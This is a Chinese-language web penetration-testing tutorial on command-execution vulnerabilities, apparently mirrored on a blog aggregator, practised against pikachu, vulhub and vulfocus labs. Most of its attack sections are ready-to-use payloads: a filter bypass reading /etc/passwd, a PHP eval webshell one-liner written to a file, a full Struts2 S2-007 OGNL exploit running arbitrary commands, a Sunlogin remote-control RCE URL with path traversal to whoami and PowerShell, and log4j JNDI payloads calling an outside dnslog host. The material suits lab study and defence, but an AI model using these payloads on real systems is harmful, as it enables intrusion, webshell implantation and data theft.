Web渗透-命令执行漏洞及常见靶场探测实战

一、概述

命令执行(RCE):应用有时需要调用一些执行系统命令的函数,如php中的system,exec,shell exec,passthru,popen,proc popen等,当用户能控制这些函数的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

二、利用条件

1 应用调用执行系统命令的函数
2 将用户输入作为系统精灵的参数拼接到命令行中
3 没有对用户输入进行过滤

三、漏洞分类

1 代码层过滤不严
商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:
system("/bin/program--arg $arg");
2 系统的漏洞造成命令注入
比如:bash破壳漏洞 (cve-2014-6271)
3 调用的第三方组件存在代码执行漏洞
如wordpress中用来处理图片的imagemagick组件
java中的命令执行漏洞(struts2/elasticsearchgroovy等)
thinkphp命令执行
4 远程命令执行漏洞(执行的是命令)
指 用户通过浏览器提交执行操作命令,由于服务器端,没有针对执行函数做过滤,就执行了恶意命令。
5 远程代码执行漏洞(执行的是代码)
也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码,执行恶意构造的脚本代码

三、命令执行漏洞攻击

命令连接符(windows)

| || & && 的区别:
& :无论左边还是false还是true,右边都会执行(可以同时执行多条命令)
&&: 左边错误,右边也不执行
| :都为true,只执行右边的命令
|| : 左边为false,才会执行右边的

image.png

命令连接符(Linux)

& : 后台运行( 杀进程命令:kill -s 9)
; :连接符 
&& : 左边的执行成功后,右边的才会执行
|| : 左边错,执行右边

五、PHP执行系统命令内置函数

system()
exec()
shell_exec()
passthru()
pcntl_exec()
popen()
proc_open()

六、绕过方式

注意点:在Linux下,passwd是命令,/etc/passwd是文件

情景一:路径被过滤

# 使用通配符
* :多个
? : 一个
# 特殊方式 
# /'

image.png

# 未初始化变量 $a(和空格的作用类似)
cat$a /etc$a/passwd$a

七、pikachu靶场测试

命令执行漏洞

#  输入
| dir 

image.png

代码执行漏洞

# 输入
system("ipconfig");

image.png

代码执行漏洞-写入木马示例

# cmd示例:
echo "<?php @eval($_POST['cmd'])?>;" > a.php

七、漏洞复现-struts2-S2-007

  • 使用靶场:https://vulhub.org/
  • 靶场搭建文档:https://vulhub.org/#/docs/
  • 漏洞复现文档:
 # 原理参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html当配置了验证规则 `<ActionName>-validation.xml` 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction:```java
(...)
public class UserAction extends ActionSupport {private Integer age;private String name;private String email;(...)

然后配置有 UserAction-validation.xml:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC"-//OpenSymphony Group//XWork Validator 1.0//EN""http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators><field name="age"><field-validator type="int"><param name="min">1</param><param name="max">150</param></field-validator></field>
</validators>

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

因为受影响版本为 Struts2 2.0.0 - Struts2 2.2.3,所以这里给出绕过安全配置进行命令执行的 Payload(弹计算器,无法在本项目环境下运行):

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@java.lang.Runtime@getRuntime().exec("open /Applications/Calculator.app")) + '

Exploit

@rickgray 在原文中只给了弹计算器的POC,我给出执行任意代码的EXP:

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

将Exp传入可以利用的输入框(age),得到命令执行结果:

                                                                                                                                                                    25,0-1        88%

- 复现过程:- 启动docker容器:`docker-compose  up -d`- 查看dock容器启动端口:`docker ps`![image.png](https://cdn.nlark.com/yuque/0/2024/png/38516294/1719459325055-73add876-ff67-4ef6-91a0-200153007a8c.png#averageHue=%23252220&clientId=u40555cc2-d63d-4&from=paste&height=43&id=u70fd076a&originHeight=43&originWidth=1178&originalType=binary&ratio=1&rotation=0&showTitle=false&size=5407&status=done&style=none&taskId=u3034b2b4-15f5-44c4-96d9-32038db9c5b&title=&width=1178)- 查看dock容器启动端口:访问8080端口![image.png](https://cdn.nlark.com/yuque/0/2024/png/38516294/1719459373868-883f650e-69ef-47f2-b041-30b126737737.png#averageHue=%23d2d1d1&clientId=u40555cc2-d63d-4&from=paste&height=417&id=uc8c5fc8a&originHeight=417&originWidth=726&originalType=binary&ratio=1&rotation=0&showTitle=false&size=19204&status=done&style=none&taskId=ucfc9b5a3-fea3-41b5-ba07-92410a64e34&title=&width=726)- 传递文档中的参数编码并抓包- <br />
```shell
# url编码网址:https://www.qianbo.com.cn/Tool/Url-Encode.html
# 源 
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '#编码后结果
'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('ls').getInputStream()))%20%2B%20'

image.png

  • 结果:

image.png

七、向日葵漏洞

版本:11.0.0.33162
启动向日葵后会启动一个4万以上的端口,通过nmap可以扫描出。
获取cookie网址:ip:端口cgi-bin/rpc?action=verify-haras(verify_string:参数值)
#注入:
http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%26c:%26%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2Fwhoami
或
http://xx.xx.xx.xx:xxxxx/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+whoami请求包Cookie格式:
Cookie:CID=verify_string参数值

八、log4j靶场检测

靶场搭建

# 拉取容器
docker pull vulfocus/log4j2-rce-2021-12-09
# 启动
docker run -tid -p 8080:8080  vulfocus/log4j2-rce-2021-12-09
# 查看状态
docker ps

image.png
image.png

检测漏洞

# url编码网址:https://www.qianbo.com.cn/Tool/Url-Encode.html
命令:${jndi:ldap://域名/exp}
# 在http://www.dnslog.cn/准备一个随机url
http://varin.cn:8080/
# 步骤:
点击?????后在url添加
http://varin.cn:8080/hello?payload=${jndi:ldap://xl4nrl.dnslog.cn/exp}
# 将此进行url编码:${jndi:ldap://xl4nrl.dnslog.cn/exp}
结果为:%24%7Bjndi%3Aldap%3A%2F%2Fxl4nrl.dnslog.cn%2Fexp%7D
# 重新拼接后并访问:
http://varin.cn:8080/hello?payload=%24%7Bjndi%3Aldap%3A%2F%2Fxl4nrl.dnslog.cn%2Fexp%7D

image.png
访问后结果:
有回显,存在漏洞
image.png

扩展

  • 工具下载
# 工具:JNDI-Injection-Exploit v1.0
# 下载地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
# kali 下载:
wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/37912.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

004-GeoGebra基础篇-GeoGebra的点

新手刚开始操作GeoGebra的时候一般都会恨之入骨&#xff0c;因为有些操作不进行学习确实有些难以凭自己发现。 目录 一、点的基本操作1. 通过工具界面添加点2. 关于点的选择&#xff08;对象选择通用方法&#xff09;&#xff08;1&#xff09;选择工具法&#xff08;2&#xf…

【高考志愿】光学工程

目录 一、专业概述 二、专业特点 三、研究和就业方向 3.1 研究方向 3.2 就业方向 四、光学工程专业排名 高考志愿选择光学工程专业无疑是一项既具深度又富挑战性的明智之举。这个古老而充满魅力的专业&#xff0c;正逐渐崭露其在现代社会中的重要性与独特魅力。 一、专业…

NOI大纲——普及组——位运算总结

位运算总结 1.位运算符号 & \& &——按位与 如果两个相应的二进制位都为1&#xff0c;则该位的结果值为1&#xff0c;否则为0 ∣ | ∣——按位或 两个相应的二进制位中只要有一个为1&#xff0c;该位的结果值为1 ^——按位异或 若参加运算的两个二进制位值相同则…

“势”是“态”的偶然性减少

“态势感知”中的“势”指的是一种趋势或倾向性&#xff0c;而“态”则表示状态或局势。这个术语常用于描述在一段时间内系统或事件显示出来的方向性变化或发展趋势。因此&#xff0c;可以将“态势”理解为系统或事件状态变化的趋势&#xff0c;这种变化通常反映出偶然性减少的…

解析Java中1000个常用类:Calendar类,你学会了吗?

推荐一个我自己写的程序员在线工具站: http://cxytools.com 提供一站式在线工具平台,专为程序员设计,包括时间日期、JSON处理、SQL格式化、随机字符串生成、UUID生成、随机数生成、文本Hash等功能,提升开发效率。 以下是正文。 在 Java 编程中,处理日期和时间是一个常见…

Java新手启航:Windows下JDK安装,开启编程之旅

你是不是对编程充满好奇&#xff0c;想要迈入Java的世界&#xff0c;却不知道从何开始&#xff1f;别担心&#xff0c;每一个Java大师都是从安装JDK开始的&#xff0c;而今天&#xff0c;我将手把手教你如何轻松完成JDK的安装&#xff0c;让你迈出编程之旅的第一步! 接下来&am…

websocket基础使用学习

websocket基础使用学习 一、websocket是什么&#xff1f;二、使用步骤1.websocket服务的安装与启动安装服务连接与发消息 总结 一、websocket是什么&#xff1f; 以前&#xff0c;很多网站为了实现推送技术&#xff0c;所用的技术都是Ajax 轮询。轮询是在特定的的时间间隔&…

ios18开发者预览,Beta 2升级新增镜像等功能

近日&#xff0c;苹果发布了 iOS 18 开发者预览版 Beta 2 升级&#xff0c;为 iPhone 用户带来了多项新功能。据了解&#xff0c;这些新功能包括 iPhone 镜像和 SharePlay 屏幕共享&#xff0c;以及其他新增功能。 据了解&#xff0c;iPhone镜像可以让Mac用户将iPhone屏幕镜像…

OLMo:真正完全开源的大模型

最近&#xff0c;又有一家机构AI2&#xff08;Allen Institute for AI&#xff09;开源了一个LLM&#xff1a;OLMo&#xff0c;它的英文全称就叫Open Language Model。相比之前开源的大模型&#xff0c;OLMo的独特之处是完全开源&#xff0c;除了训练的模型&#xff0c;OLMo还开…

ElementUI的基本搭建

目录 1&#xff0c;首先在控制终端中输入下面代码&#xff1a;npm i element-ui -S 安装element UI 2&#xff0c;构架登录页面&#xff0c;login.vue​编辑 3&#xff0c;在官网获取对应所需的代码直接复制粘贴到对应位置 4&#xff0c;在继续完善&#xff0c;从官网添加…

商业智能(BI)实战项目

商业智能&#xff08;BI&#xff09;实战项目 期待您的关注 ☀大数据学习笔记 1.实现的功能 2.数据库操作步骤 创建数据库&#xff1a;create database card;创建表&#xff1a;create table card_apply ( cid bigint primary key auto_increment ,apply_uid bigint ,apply_ent…

商城自动化测试实战 —— 登录+滑块验证

hello大家好&#xff0c;我是你们的小编&#xff01; 本商城测试项目采取PO模型和数据分离式架构&#xff0c;采用pytestseleniumjenkins结合的方式进行脚本编写与运行&#xff0c;项目架构如下&#xff1a; 1、创建项目名称&#xff1a;code_shopping&#xff0c;创建所需项目…

openEuler安装docker

在openEuler上安装Docker&#xff0c;可以通过以下步骤进行&#xff1a; 1、更新软件包索引&#xff1a; sudo yum makecache 2、安装Docker&#xff1a; sudo yum install docker -y 3、启动Docker服务&#xff1a; sudo systemctl start docker 4、设置Docker开机自启&am…

010、GPT-5:AI新纪元的曙光与挑战

目录 GPT-5&#xff1a;AI新纪元的曙光与挑战 1.革命性的个人助理 2.教育领域的变革 3.医疗健康的新篇章 4.科研创新的加速器 5.创意产业的新灵感 6.商业与经济的智能化 7.社会治理的新工具 8.环境保护与可持续发展 9.伦理与社会影响 学术视角&#xff1a;AI发展的前…

惠海H6392 2.6v升5V 3.7V升9V 4.2V升12V 升压恒压芯片 小家电IC

惠海H6392升压恒压芯片是一款小家电、移动设备以及其他需要升压恒压电源的电子设备设计的DC-DC转换器。这款芯片以其独特的产品特性和广泛的应用场景&#xff0c;为电子产品设计者提供了高效、稳定的电源解决方案。 产品描述&#xff1a; H6392采用了简单的电流模式升压技术&a…

使用Collections.shuffle打乱集合顺序

使用Collections.shuffle打乱集合顺序 大家好&#xff0c;我是免费搭建查券返利机器人省钱赚佣金就用微赚淘客系统3.0的小编&#xff0c;也是冬天不穿秋裤&#xff0c;天冷也要风度的程序猿&#xff01;今天我们将探讨如何使用Java中的Collections.shuffle方法来打乱集合的顺序…

单例模式实现方式

单例模式 单例模式&#xff08;Singleton Pattern&#xff09;的主要目的是确保一个类只有一个实例&#xff0c;并提供一个全局访问点来访问该实例。 在 Java 中&#xff0c;实现单例模式的方式有几种常见的方式 懒汉式 public class Singleton{private static final Singlet…

华为od-C卷200分题目4 -电脑病毒感染

华为od-C卷200分题目4 -电脑病毒感染 一个局域网内有很多台电脑&#xff0c;分别标注为0 - N-1的数字。相连接的电脑距离不一样&#xff0c;所以感染时间不一样&#xff0c;感染时间用t表示。其中网络内一个电脑被病毒感染&#xff0c;其感染网络内所有的电脑需要最少需要多长…

二叉树的题目

目录 1、将遍历的结果放在list中 2、判断两棵树是否相同 3、翻转二叉树 4、判断平衡二叉树 5、判断二叉树是否对称 6、判断是否为完全二叉树 先创建一个二叉树 public class BinaryTree {static class TreeNode {public char val;public TreeNode left;public TreeNode …

NextJs 系列文章

NextJs 系列文章 NextJs 初级篇 - 安装 | 路由 | 中间件NextJs 渲染篇 - 什么是CSR、SSR、SSG、ISR 和服务端/客户端组件NextJs 数据篇 - 数据获取 | 缓存 | Server Actions